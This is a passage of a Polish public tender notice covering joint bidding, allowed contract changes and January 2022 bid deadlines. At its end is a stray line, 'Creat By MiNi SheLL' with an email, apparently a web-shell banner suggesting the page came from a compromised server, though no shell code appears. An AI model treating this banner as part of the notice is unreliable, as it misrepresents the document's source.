2 PZP powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11.2.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:<br/>11.2.1.	Szczególny sposób spełniania przez takich Wykonawców warunków udziału w postępowaniu: Zamawiający nie precyzuje.<br/>11.2.2.	Wykonawcy tacy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>11.2.3.	Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w pkt. 11.1.2 SWZ. jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane.<br/>11.2.4.	Do Wykonawców takich stosuje się odpowiednio przepisy dotyczące Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany Umowy wymagają formy pisemnej pod rygorem nieważności, z<br/>zastrzeżeniem odrębnych postanowień niniejszej Umowy.<br/>2. Zamawiający, poza sytuacjami przewidzianymi w art. 455 ustawy PZP, dopuszcza zmiany<br/>postanowień Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru<br/>Wykonawcy, w następującym zakresie:<br/>1) terminu realizacji przedmiotu Umowy z powodu siły wyższej lub działań osób trzecich<br/>uniemożliwiających realizację przedmiotu Umowy, które to działania nie są konsekwencją winy<br/>którejkolwiek ze Stron – o czasu równy okresowi, w którym nie było możliwe prowadzenie prac<br/>związanych z przedmiotem Umowy;<br/>2) w przypadku uchwalenia lub zmiany obowiązujących przepisów, których uchwalenie lub<br/>zmiana nastąpiły po dniu zawarcia Umowy, a z których treści wynika konieczność lub zasadność<br/>wprowadzenia zmian do Umowy w zakresie koniecznym do uzyskania zgodności realizacji<br/>przedmiotu Umowy z obowiązującym stanem prawnym;<br/>3. Ponadto Zamawiający przewiduje zmianę wynagrodzenia wskazanego w § 6 ust. 1 w<br/>przypadku zmiany:<br/>1) stawki podatku od towarów i usług oraz podatku akcyzowego;<br/>2) wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki<br/>godzinowej, ustalonych na podstawie ustawy z dnia 10 października 2002 r. o minimalnym<br/>wynagrodzeniu za pracę;<br/>3) zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie zdrowotne,<br/>4) zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których<br/>mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-20 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/khk</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-20 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com